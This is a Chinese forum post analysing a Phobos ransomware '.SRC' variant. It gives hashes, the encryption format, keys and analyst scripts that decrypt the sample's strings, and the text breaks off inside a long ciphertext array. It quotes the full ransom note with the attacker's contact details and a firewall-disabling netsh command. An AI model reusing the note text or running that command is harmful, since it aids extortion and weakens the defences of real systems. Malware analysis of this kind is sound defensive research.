吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2350|回复: 10
上一主题 下一主题
收起左侧

[PC样本分析] 【病毒分析】Phobos家族新变种 .SRC深度分析:揭示持续演变的勒索新威胁

  [复制链接]
跳转到指定楼层
楼主
solar应急响应 发表于 2024-10-17 17:34 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Solarsec 于 2024-10-18 09:20 编辑

1.背景

自 2019 年初以来,Phobos 勒索软件家族通过不断的更新与演变,成为一种全球范围内威胁严重的勒索软件。Phobos 主要通过 RDP 暴力破解和钓鱼邮件来进行传播,目标包括企业和个人用户,其感染数量呈不断上升的趋势。Phobos 家族常被认为是 Dharma 勒索软件(CrySis)的升级版,其加密方式、部分代码和勒索信的格式与 CrySis 家族非常相似。然而,Phobos 家族的新变种 .SRC 表现出了一些独特的特点,例如不同的勒索信内容,以及对某些文件夹和文件类型的处理方式上的区别,显示了其在持续演变过程中的差异化特征。

1.1 技术特征

Phobos .SRC 变种在技术上继承了 Phobos 勒索软件的许多特性,同时也有一些改进与变化。以下是其主要技术特征:

  • 加密方式:Phobos 使用 AES-256 和 RSA-1024 的混合加密系统,其中 AES 用于对称加密文件,RSA 用于非对称加密关键密钥,确保文件的加密和解密具有高度的安全性。
  • 持久化与特权提升:为了确保感染持久性,Phobos 会将自身注册到 Windows 启动项和注册表的 Run 键中,并使用工具如 Smokeloader 进行进程注入,使恶意代码隐藏在合法进程中,从而逃避安全软件的检测。
  • 防御规避:Phobos 勒索软件利用 Windows 内置命令(如 netsh firewall set opmode mode=disable)来禁用防火墙,并使用工具如 Process Hacker 和 PowerTool 规避系统防御。同时,它会删除卷影副本,以防止受害者通过系统还原来恢复数据。
  • 凭证访问与数据收集:攻击者使用工具如 Mimikatz、Bloodhound 以及 NirSoft 从受感染系统中提取凭证和域账户信息,进行权限提升和 lateral movement。
  • 加密文件目标:Phobos 会加密所有文件,但会跳过特定文件类型和路径,以便于提高加密速度并减少误操作的风险。它通过 Windows API 获取系统区域信息,如果发现受害系统使用特定的语言环境(如俄语),则会终止感染以避免攻击该区域。

1.2 联系方式与文件后缀

在最新的Phobos勒索病毒.SRC变种中,勒索信的表现形式有所不同:以前的典型勒索信会生成两种文件格式——info.txt和info.hta,并分布于受感染的每个文件夹中。然而,在.SRC变种中,勒索信则更改为+README-WARNING+.txt格式,且未生成hta格式文件。此外,新变种的联系邮箱也发生了变化,使用的是chewbacca@cock.li,并新增了Tor联系渠道以增强匿名性。

勒索信内容也进行了显著调整。与旧版本的Phobos勒索信相比,.SRC变种的勒索信内容更加详尽,不再仅仅是几句简单的通知。相反,新的勒索信采用了FAQ形式,通过详细的说明引导受害者与攻击者联系,强调这是最“明智”的选择。这种变化表明Phobos家族在与受害者沟通时愈发注重细节,并努力使受害者相信支付赎金是恢复数据的唯一出路。

2.恶意文件基础信息

2.1 加密器基本信息

文件名: SRC_Visual.exe
编译器: Microsoft Visual C/C++(14.00.50727)[LTCG/C++]
大小: 50176(49.00 KiB)
操作系统: Windows(95)
架构: I386
模式: 32 位
类型: GUI
字节序: LE
MD5: a60e2c0dec417d2dabe40c003f39c4f2
SHA1: 4e7dc90c06429690c189097dac853d52812a2344
SHA256: 52d89ac9f3b1c74c978618f81b9323ffa8d4b8ace29b12f82bade43fca90719e

2.3 勒索信

+README-WARNING+.txt

::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don’t want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.

:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

3.加密后文件分析

3.1 威胁分析

病毒家族 Phobos
首次出现时间/捕获分析时间 2019/05 || 2024/08/14
威胁类型 勒索软件,加密病毒
加密文件扩展名 [C0C5CE62].[hudsonL@cock.li].SRC
勒索信文件名 +README-WARNING+.txt
有无免费解密器?
联系邮箱 chewbacca@cock.li
检测名称 Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)),Cylance(Unsafe),DeepInstinct(MALICIOUS),Emsisoft(Gen:Variant.Tedy.512515 (B)),ESET-NOD32(A Variant Of MSIL/Filecoder.LU),GData(Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt),K7GW(Trojan ( 0052f4e41 ))
感染症状 无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(例如,solar.docx.locked)。桌面上会显示一条勒索要求消息。网络犯罪分子要求支付赎金(通常以比特币)来解锁您的文件。
感染方式 受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接
受灾影响 所有文件都经过加密,如果不支付赎金就无法打开。其他密码窃取木马和恶意软件感染可以与勒索软件感染一起安装。

3.2 加密的测试文件

3.2.1 文件名

sierting.txt

3.2.2 文件大小

0x228 字节

3.2.3 具体内容


16进制:

3.3 加密特征

3.3.1 加密文件名特征

加密文件名 = 原始文件名+加密后缀 ,例如:sierting.txt.[F2479DE1].[chewbacca@cock.li].SRC

3.3.2 加密数据特征

文件大小 < = 0x40000字节(全加密)

文件原始大小+0~16字节不定长的填充数据+8个字节的\xff+不定长的文件名称结构的加密数据+4字节的文件名称结构的加密数据长度+16字节的IV + 128字节的RSA加密的AES密钥 + 4字节的固定值 + 4字节的加密标志


文件大小 > 0x40000字节(部分加密):


0x40000大小的加密数据 + 文件剩余原始数据 + 不定长的文件名称结构的加密数据+4字节的文件名称结构的加密数据长度+16字节的IV + 128字节的RSA加密的AES密钥+ 4字节的固定值 + 4字节的加密标志

3.3.3 加密算法

文件加密使用了AES-CBC加密算法,对于文件加密所使用的KEY采用了RSA加密。

程序内字符串的解密用到了AES-ECB加密算法。

AES密钥生成
KEY

由produce_random_key函数生成,具体实现可以看密钥生成部分的分析,这里取部分实现


可以看到KEY主要是32位的随机数,随机数生成器是CryptGenRandom函数**。**

IV

这部分可以看文件加密部分,具体实现可以看文件加密部分的分析,IV主要由produce_random函数生成,这里取部分实现:


可以看到IV是一串16字节的随机数,随机数生成器是CryptGenRandom函数**。**

RSA密钥生成
公钥

由字符串解密便宜标志'0xa'解密得来,自带BLOB结构,如下:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000

3.3.4 加密器释放文件

勒索信(+README-WARNING+.txt)
文件内容

```C++
::: Greetings :::

Little FAQ:

.1.
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2.
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3.
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don’t want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.

:::BEWARE:::
DON'T try to change encrypted files by yourself!
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

成分分析

勒索信的全部信息都是由字符串解密偏移标志'0x8'解密得来,跟加密的ID无任何关系。

勒索壁纸(xxx.tmp.bmp)
文件内容

成分分析

由字符串解密偏移标志'0x3a'解密得来的字符串“Your files were encrypted!”,绘制在制定画布上得来。

4. 逆向分析

4.1 加密器逆向分析

4.1.1 程序入口

打开程序发现开头首先调用了sub_407A90函数来实现对执行用户权限的检查之后又调用了sub_4077D0函数对执行参数做了校验,接着调用init_enc_obj函数实现初始化加密对象和解密了部分字符串,最后根据前面的条件进行判断是否是管理员权限并且输入的参数是否合规,如果不合规则退出。


在完成了上述的校验后,将调用Init_GUI函数来显示程序窗口来根据用户需求来触发各种的事件。

4.1.2 检查启动权限(sub_407A90函数)

这里是比较常规的Check管理员的实现

4.1.3检查启动参数(sub_4077D0函数)

这里主要检查了一下输入的启动参数,然后根据参数是否存在和值来返回固定的值:

返回值为0:无参数

返回值为1:参数为e

返回值为2:参数为n+一串数字

4.1.4 解密字符串(sub_402950函数)

逻辑分析

这里算是整个程序遇到的第一个算法,这里可以随便找一个,都可以看到,字符串的解密操作都是根据该标志来进行的,第一个标志对应着一串字符,也算是Phobos家族系列的经典操作之一。


在分析了多个版本的Phobos变种,都可以看到,每个版本的字符串解密都不太一样,而我们这个版本的Phobos变种采用的依旧是AES256加密算法ECB模式的解密方式,但是很明显是自己写的,进入到函数内部可以通过导入密钥的Blob结构部分可以得知具体的加密类型和算法模式等信息。


开始分析,首先从外部调用可以看到,依旧是比较常见的偏移标志的查找,根据偏移标志来找寻对应的字符串的长度和密文位置。

密类型为PROV_RSA_AES,然后下面调用CryptImportKey来导入加密密钥,其中在导入密钥前会存在一个Blob的结构,具体的加密类型可以依靠该结构进行识别。

AES密钥(解密字符串):

8C93C36117EE77655080C789D0B92C73C91F1FDA560942CA72AA3DB5AC4CACB1


在完成了加密密钥的导入后,就该解密密文数据了


这里我们写一个IDA Python脚本将数据和标志全部提取出来:

import idautils
import idaapi
import idc

addr = 0x41F000
sum_cipher = []
for i in range(0,0x2d):
    data_addr = addr+8*i
    data = hex(idc.read_dbg_byte(data_addr))
    len = idc.read_dbg_word(data_addr+4)-idc.read_dbg_word(data_addr+2)
    cipher = []
    for k in range(0,len):
        cipher_data_addr = addr+idc.read_dbg_word(data_addr+2)+k
        cipher.append(idc.read_dbg_byte(cipher_data_addr))
    sum_cipher.append(cipher)
    print(data,cipher)
    print('-'*100)

然后处理一下数据(从标志0开始),构造一个C++脚本来实现对数据的解密:

#include <windows.h>
#include <wincrypt.h>
#include <iostream>
#include <vector>
#include <sstream>
#include <iomanip>
void PrintHex(const std::vector<BYTE>& data) {
    std::cout << "Hex: ";
    for (BYTE b : data) {
        std::cout << std::hex << std::setw(2) << std::setfill('0') << (int)b;
    }
    std::cout << std::endl;
}

int main() {
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY hKey = NULL;
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        std::cout << "Failed to acquire crypto context!" << std::endl;
        return 1;
    }
    unsigned char key[32] = {
        0x8C, 0x93, 0xC3, 0x61, 0x17, 0xEE, 0x77, 0x65, 0x50, 0x80,
        0xC7, 0x89, 0xD0, 0xB9, 0x2C, 0x73, 0xC9, 0x1F, 0x1F, 0xDA,
        0x56, 0x09, 0x42, 0xCA, 0x72, 0xAA, 0x3D, 0xB5, 0xAC, 0x4C,
        0xAC, 0xB1
    };
    struct {
        BLOBHEADER hdr;
        DWORD keySize;
        BYTE keyData[32];
    } keyBlob;
    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
    keyBlob.hdr.reserved = 0;
    keyBlob.hdr.aiKeyAlg = CALG_AES_256;
    keyBlob.keySize = 32;
    memcpy(keyBlob.keyData, key, 32);
    std::vector<std::string> sign_list = { "0x0", "0x1", "0x4", "0x5", "0x6", "0x7", "0x8", "0x9", "0xa", "0xc", "0xe", "0xf", "0x10", "0x11", "0x12", "0x13", "0x14", "0x16", "0x17", "0x18", "0x19", "0x1a", "0x1b", "0x1e", "0x1f", "0x20", "0x21", "0x22", "0x23", "0x24", "0x25", "0x26", "0x27", "0x28", "0x29", "0x2a", "0x2b", "0x2c", "0x33", "0x36", "0x37", "0x38", "0x39" ,"0x3a"};;
    std::vector<std::vector<BYTE>> cipher_list = { 
        {84, 193, 164, 131, 219, 130, 47, 108, 192, 20, 48, 116, 31, 202, 206, 31, 45, 132, 42, 178, 65, 215, 203, 28, 93, 184, 43, 117, 78, 237, 248, 206}, {205, 64, 217, 196, 63, 9, 44, 9, 32, 203, 49, 156, 87, 2, 229, 192, 14, 183, 145, 174, 109, 239, 47, 175, 41, 89, 206, 231, 223, 102, 191, 13, 255, 204, 188, 186, 210, 176, 6, 8, 110, 232, 254, 109, 118, 217, 78, 57, 158, 125, 43, 169, 138, 255, 110, 33, 149, 64, 176, 49, 153, 106, 79, 208}, 
        {115, 228, 119, 26, 133, 194, 217, 50, 140, 71, 43, 242, 116, 74, 143, 37, 208, 175, 234, 92, 156, 221, 229, 239, 183, 235, 157, 27, 197, 252, 116, 193, 129, 8, 105, 72, 249, 190, 174, 42, 85, 197, 181, 37, 184, 148, 156, 79, 16, 180, 57, 73, 69, 57, 244, 223, 183, 5, 172, 121, 226, 104, 8, 207, 104, 149, 188, 150, 207, 173, 233, 11, 182, 16, 16, 96, 226, 157, 113, 183, 191, 75, 238, 170, 44, 115, 0, 215, 213, 227, 94, 153, 62, 19, 15, 245, 102, 108, 148, 54, 79, 141, 48, 109, 69, 25, 169, 99, 210, 62, 139, 58, 52, 38, 195, 4, 125, 77, 253, 132, 136, 83, 163, 202, 174, 61, 177, 136, 170, 162, 186, 37, 195, 209, 93, 172, 38, 223, 26, 194, 101, 55, 249, 168, 208, 58, 190, 123, 56, 115, 1, 227, 50, 223, 107, 220, 31, 168, 173, 133, 171, 179, 82, 15, 10, 127, 251, 173, 187, 49, 213, 191, 149, 201, 93, 54, 187, 124, 207, 180, 186, 26, 55, 212, 102, 29, 97, 215, 76, 198, 188, 17},
        {222, 55, 116, 106, 205, 240, 172, 80, 144, 36, 154, 125, 243, 40, 137, 67, 242, 106, 3, 192, 230, 18, 88, 45, 138, 203, 130, 141, 255, 206, 44, 196, 102, 200, 233, 123, 44, 15, 163, 29, 159, 34, 139, 36, 233, 181, 55, 138, 73, 231, 255, 89, 123, 127, 226, 171, 187, 66, 102, 214, 42, 138, 31, 146, 24, 220, 180, 89, 206, 36, 47, 58, 169, 128, 102, 212, 139, 165, 184, 246, 242, 203, 51, 33, 247, 235, 206, 147, 165, 134, 240, 14, 97, 152, 221, 55, 72, 204, 140, 107, 155, 57, 33, 147, 169, 23, 61, 86, 34, 160, 138, 160, 53, 122, 51, 154, 19, 108, 152, 195, 74, 243, 64, 81, 231, 96, 235, 61, 222, 207, 140, 216, 39, 79, 16, 124, 117, 85, 195, 237, 174, 50, 49, 169, 21, 157, 216, 39, 175, 185, 87, 175, 185, 78, 225, 68, 131, 211, 161, 5, 199, 178, 175, 110, 57, 43, 202, 237, 8, 38, 229, 175, 240, 221, 234, 22, 113, 33, 159, 75, 206, 161, 164, 199, 129, 6, 15, 146, 198, 218, 102, 66, 238, 102, 84, 67, 21, 62, 5, 74, 189, 47, 246, 126, 25, 197, 166, 136, 150, 180, 237, 145, 15, 14, 81, 83, 28, 131, 178, 6, 116, 71, 129, 10, 48, 74, 174, 74, 179, 248, 134, 41, 225, 100, 161, 133, 65, 16, 176, 249, 209, 89, 212, 4, 73, 131, 128, 140, 185, 190, 80, 204, 214, 41, 183, 208, 61, 130, 53, 115, 177, 246, 27, 174, 13, 127, 218, 158, 42, 63, 201, 237, 22, 201, 231, 92, 9, 151, 180, 165, 113, 66, 57, 4, 153, 102, 56, 239, 24, 136, 195, 251, 23, 99, 99, 112, 139, 221, 39, 9, 225, 168, 220, 107, 210, 95, 127, 83, 6, 156, 124, 60, 246, 100, 54, 194, 110, 59, 227, 65, 232, 39, 119, 177, 195, 89, 172, 148, 229, 131, 92, 47, 52, 169, 2, 77, 223, 179, 233, 41, 21, 204, 0, 85, 160, 103, 243, 112, 213, 70, 174, 248, 255, 28, 176, 17, 114, 204, 152, 97, 250, 181, 127, 84, 49, 236, 52, 4, 207, 141, 234, 22, 20, 12, 151, 241, 143, 113, 219, 207, 216, 45, 199, 218, 235, 12, 142, 161, 97, 62, 208, 19, 82, 179, 109, 119, 184, 213, 216, 222, 23, 29, 192, 79, 127, 209, 111, 155, 171, 133, 110, 254, 188, 75, 22, 117, 33, 166, 105, 146, 230, 134, 184, 233, 46, 110, 150, 94, 222, 27, 250, 42, 141, 230, 24, 173, 165, 11, 46, 80, 101, 140, 74, 190, 118, 157, 133, 133, 111, 69, 211, 96, 83, 148, 160, 230, 148, 96, 104, 79, 204, 164, 9, 119, 33, 189, 150, 180, 206, 83, 201, 149, 17, 111, 15, 19, 130, 169, 253, 16, 178, 47, 242, 181, 203, 111, 250, 156, 212, 177, 157, 44, 44, 228, 76, 61, 203, 146, 68, 127, 156, 10, 0, 121, 113, 32, 254, 96, 115, 249, 208, 239, 251, 146, 179, 26, 6, 99, 22, 46, 255, 175, 121, 42, 5, 223, 234, 145, 115, 201, 199, 155, 76, 76, 244, 5, 39, 97, 249, 52, 71, 52, 23, 235, 255, 187, 194, 0, 52, 239, 14, 158, 34, 206, 51, 255, 167, 208, 121, 36, 70, 7, 147, 100, 122, 46, 105, 219, 244, 212, 77, 137, 205, 241, 61, 23, 247, 184, 247, 16, 22, 238, 176, 33, 171, 13, 250, 131, 18, 28, 189, 226, 86, 219, 21, 90, 99, 238, 212, 7, 58, 7, 225, 187, 159, 115, 67, 136, 87, 111, 131, 46, 99, 209, 80, 45, 64, 163, 104, 40, 29, 84, 238, 36, 150, 1, 18, 5, 10, 69, 160, 220, 38, 216, 237, 232, 225, 18, 246, 104, 39, 54, 58, 83, 88, 109, 61, 228, 77, 188, 14, 206, 25, 15, 172, 135, 69, 24, 75, 85, 42, 17, 109, 132, 235, 52, 113, 5, 222, 33, 38, 241, 229, 76, 235, 221, 227, 52, 0, 196, 130, 239, 73, 130, 254, 70, 102, 230, 145, 84, 94, 76, 190, 140, 220, 34, 113, 202, 141, 77, 141, 80, 161, 94, 111, 124, 118, 63, 124, 91, 211, 45, 178, 205, 64, 159, 155, 157, 30, 69, 242, 141, 225, 107, 207, 122, 56, 221, 96, 69, 168, 56, 131, 176, 30, 69, 95, 78, 38, 139, 48, 203, 14, 133, 166, 61, 8, 86, 217, 70, 158, 73, 153, 172, 52, 13, 210, 249, 252, 106, 119, 245, 87, 4, 247, 198, 35, 138, 162, 251, 164, 201, 40, 13, 33, 27, 101, 114, 228, 167, 182, 62, 47, 79, 36, 18, 116, 237, 159, 181, 244, 147, 7, 77, 228, 144, 171, 236, 249, 110, 237, 118, 67, 84, 8, 141, 11, 40, 122, 163, 163, 111, 88, 221, 251, 133, 158, 159, 139, 119, 109, 119, 223, 212, 2, 112, 152, 253, 133, 245, 209, 62, 203, 255, 24, 91, 4, 123, 104, 212, 253, 13, 164, 58, 48, 233, 37, 14, 201, 209, 177, 47, 59, 162, 223, 210, 15, 119, 86, 69, 174, 151, 201, 55, 45, 5, 142, 252, 215, 79, 25, 187, 230, 157, 238, 30, 222, 176, 233, 147, 156, 235, 120, 13, 177, 53, 80, 21, 99, 147, 199, 93, 95, 18, 3, 50, 48, 92, 227, 81, 102, 102, 227, 255, 58, 167, 101, 200, 142, 189, 166, 54, 162, 189, 123, 233, 50, 67, 26, 236, 144, 200, 23, 2, 159, 147, 17, 158, 111, 149, 11, 160, 99, 60, 0, 47, 163, 107, 70, 107, 59, 100, 0, 141, 1, 134, 104, 30, 221, 110, 109, 103, 243, 243, 229, 236, 185, 252, 69, 196, 229, 0, 198, 35, 222, 28, 253, 193, 234, 124, 60, 196, 255, 192, 240, 45, 70, 51, 186, 43, 55, 161, 230, 103, 236, 245, 226, 61, 153, 10, 246, 149, 111, 88, 191, 230, 101, 144, 116, 13, 46, 53, 123, 34, 135, 27, 24, 107, 255, 57, 132, 133, 63, 102, 255, 136, 149, 166, 243, 150, 60, 169, 172, 11, 114, 138, 58, 77, 93, 64, 44, 166, 17, 67, 126, 137, 23, 145, 45, 234, 4, 109, 192, 153, 75, 124, 17, 98, 168, 226, 71, 164, 114, 209, 16, 57, 232, 173, 136, 220, 147, 205, 162, 79, 66, 247, 220, 14, 187, 122, 120, 152, 11, 71, 129, 242, 196, 178, 51, 102, 21, 51, 127, 203, 124, 227, 6, 221, 52, 90, 214, 222, 139, 147, 239, 199, 228, 177, 26, 160, 47, 107, 39, 101, 59, 144, 213, 61, 251, 152, 233, 185, 28, 126, 91, 197, 182, 16, 199, 26, 44, 93, 147, 212, 123, 184, 253, 253, 195, 51, 13, 53, 19, 144, 130, 92, 65, 221, 229, 90, 40, 88, 152, 29, 103, 180, 82, 225, 206, 221, 159, 83, 125, 131, 141, 215, 64, 190, 97, 128, 241, 143, 187, 47, 128, 154, 71, 165, 40, 177, 97, 218, 203, 45, 94, 87, 7, 110, 6, 32, 117, 50, 68, 46, 170, 212, 29, 81, 157, 191, 52, 113, 212, 28, 138, 9, 206, 152, 216, 251, 31, 8, 81, 237, 75, 189, 111, 15, 202, 14, 45, 199, 181, 65, 17, 3, 8, 78, 116, 72, 38, 139, 114, 82, 106, 41, 4, 70, 4, 159, 100, 109, 200, 197, 169, 232, 149, 136, 112, 133, 82, 175, 203, 162, 56, 96, 140, 81, 56, 198, 251, 198, 107, 238, 150, 33, 154, 15, 193, 150, 187, 152, 100, 193, 216, 208, 89, 57, 147, 212, 13, 64, 147, 53, 46, 10, 45, 108, 87, 157, 57, 129, 209, 222, 71, 216, 29, 17, 107, 212, 124, 196, 87, 210, 139, 11, 158, 106, 208, 230, 127, 211, 219, 176, 39, 114, 5, 101, 45, 145, 117, 47, 123, 249, 94, 80, 154, 228, 196, 126, 114, 164, 91, 127, 250, 21, 195, 247, 46, 207, 14, 117, 113, 131, 167, 224, 112, 218, 104, 231, 215, 108, 193, 147, 129, 185, 237, 26, 83, 106, 197, 190, 93, 246, 252, 42, 123, 111, 236, 102, 238, 14, 158, 58, 62, 206, 107, 11, 96, 103, 188, 210, 178, 49, 181, 197, 144, 115, 28, 240, 132, 225, 153, 189, 164, 57, 251, 180, 224, 124, 29, 19, 113, 168, 12, 73, 15, 163, 169, 119, 220, 129, 238, 160, 227, 42, 240, 228, 71, 226, 174, 59, 16, 140, 160, 91, 244, 130, 39, 208, 75, 97, 216, 174, 143, 87, 75, 65, 194, 94, 217, 201, 67, 63, 34, 229, 240, 192, 73, 64, 142, 145, 124, 209, 71, 183, 163, 153, 87, 70, 160, 105, 172, 222, 193, 117, 234, 253, 146, 211, 141, 52, 97, 58, 226, 103, 104, 8, 139, 137, 164, 243, 107, 223, 57, 142, 247, 250, 7, 33, 196, 98, 167, 195, 169, 172, 245, 55, 40, 120, 106, 167, 213, 139, 153, 48, 25, 156, 80, 40, 109, 175, 101, 205, 232, 184, 252, 156, 140, 36, 144, 225, 160, 180, 162, 178, 204, 192, 174, 189, 97, 236, 191, 14, 82, 142, 30, 141, 117, 79, 197, 208, 70, 58, 205, 227, 219, 137, 245, 170, 202, 16, 174, 20, 143, 218, 253, 235, 21, 231, 181, 226, 74, 207, 206, 137, 190, 113, 234, 115, 163, 111, 17, 156, 213, 13, 205, 14, 120, 26, 214, 18, 171, 117, 162, 255, 137, 250, 93, 235, 48, 126, 234, 49, 73, 216, 81, 206, 141, 35, 86, 55, 24, 118, 42, 128, 53, 213, 85, 253, 76, 185, 12, 230, 52, 37, 241, 172, 166, 36, 191, 168, 168, 156, 24, 228, 14, 255, 146, 237, 245, 164, 118, 15, 224, 198, 192, 29, 70, 212, 48, 27, 130, 192, 73, 199, 117, 18, 204, 216, 51, 190, 144, 171, 32, 103, 172, 12, 2, 194, 243, 231, 79, 148, 46, 193, 88, 195, 198, 165, 203, 242, 144, 225, 32, 6, 140, 219, 161, 224, 208, 211, 98, 7, 102, 117, 169, 241, 54, 122, 57, 245, 164, 66, 42, 158, 40, 45, 101, 218, 27, 112, 30, 6, 204, 104, 90, 83, 210, 151, 42, 71, 230, 110, 163, 69, 86, 230, 48, 100, 24, 249, 140, 103, 179, 187, 23, 40, 255, 144, 6, 152, 7, 86, 246, 99, 37, 169, 48, 53, 106, 234, 202, 172, 51, 95, 195, 166, 50, 208, 0, 146, 37, 75, 77, 131, 123, 223, 185, 197, 101, 54, 143, 63, 92, 194, 255, 67, 6, 22, 194, 133, 8, 199, 59, 87, 204, 206, 239, 8, 85, 91, 67, 42, 173, 231, 27, 178, 37, 40, 88, 61, 185, 156, 176, 236, 98, 167, 191, 128, 226, 168, 97, 9, 62, 71, 241, 26, 142, 7, 9, 169, 126, 33, 138, 215, 169, 55, 122, 38, 138, 50, 71, 90, 11, 175, 158, 16, 66, 34, 218, 133, 162, 225, 126, 86, 12, 40, 95, 120, 233, 242, 123, 215, 73, 167, 19, 147, 131, 151, 224, 186, 83, 227, 7, 214, 113, 229, 37, 223, 10, 66, 61, 237, 151, 36, 196, 174, 158, 118, 144, 42, 37, 169, 241, 172, 255, 61, 211, 201, 82, 254, 210, 144, 201, 123, 254, 190, 155, 227, 92, 11, 118, 220, 191, 98, 57, 249, 209, 241, 135, 31, 55, 164, 161, 158, 135, 46, 71, 213, 37, 60, 38, 39, 84, 55, 251, 52, 141, 188, 225, 38, 100, 152, 48, 7, 149, 193, 31, 222, 126, 211, 117, 90, 89, 129, 156, 57, 110, 21, 127, 248, 107, 83, 65, 49, 34, 225, 142, 54, 240, 137, 252, 57, 180, 208, 92, 161, 72, 16, 234, 11, 123, 230, 255, 18, 7, 220, 46, 48, 78, 103, 216, 153, 242, 153, 79, 17, 104, 90, 202, 0, 145, 122, 205, 196, 28, 159, 81, 141, 15, 115, 165, 220, 46, 181, 0, 122, 35, 154, 195, 173, 42, 14, 157, 241, 253, 170, 176, 232, 91, 81, 173, 0, 17, 198, 93, 26, 62, 65, 226, 102, 162, 25, 183, 235, 1, 36, 210, 196, 114, 228, 109, 148, 179, 122, 156, 128, 144, 71, 93, 77, 147, 5, 155, 204, 165, 147, 233, 238, 248, 103, 122, 173, 110, 21, 184, 98, 165, 216, 53, 27, 180, 28, 148, 200, 166, 59, 43, 142, 10, 17, 115, 247, 222, 137, 200, 167, 254, 164, 33, 75, 78, 44, 1, 156, 120, 9, 142, 218, 53, 177, 154, 149, 148, 140, 184, 254, 244, 48, 202, 226, 67, 59, 29, 168, 39, 225, 193, 122, 213, 225, 217, 66, 50, 160, 96, 133, 133, 220, 110, 232, 166, 33, 104, 90, 225, 181, 248, 59, 138, 44, 91, 229, 191, 21, 36, 173, 47, 245, 200, 37, 144, 32, 78, 11, 109, 127, 2, 98, 108, 62, 36, 83, 174, 68, 60, 109, 204, 232, 112, 115, 69, 130, 17, 46, 180, 61, 42, 158, 81, 48, 133, 137, 70, 124, 253, 37, 105, 130, 88, 239, 151, 85, 190, 146, 23, 240, 100, 71, 24, 237, 49, 254, 27, 206, 203, 247, 129, 198, 165, 15, 131, 14, 141, 91, 40, 149, 88, 64, 200, 62, 11, 167, 134, 193, 86, 203, 139, 227, 10, 243, 175, 122, 248, 3, 252, 155, 136, 137, 75, 187, 30, 54, 209, 137, 107, 14, 73, 187, 82, 246, 108, 57, 236, 179, 115, 127, 3, 236, 49, 133, 41, 217, 157, 41, 91, 106, 56, 102, 157, 62, 32, 42, 124, 185, 189, 76, 68, 158, 61, 162, 159, 24, 14, 158, 69, 164, 222, 213, 250, 156, 43, 27, 199, 96, 234, 148, 90, 228, 162, 90, 223, 1, 136, 117, 65, 142, 175, 14, 108, 76, 58, 185, 179, 138, 99, 18, 150, 178, 215, 121, 240, 98, 172, 62, 154, 8, 212, 104, 96, 111, 97, 169, 31, 137, 179, 156, 120, 145, 242, 222, 163, 59, 201, 0, 194, 24, 210, 225, 59, 191, 118, 68, 22, 223, 22, 56, 43, 24, 46, 145, 251, 127, 227, 74, 86, 105, 48, 11, 50, 223, 175, 107, 223, 210, 193, 39, 126, 5, 149, 158, 84, 240, 71, 140, 244, 19, 74, 53, 252, 81, 26, 43, 241, 44, 54, 242, 4, 169, 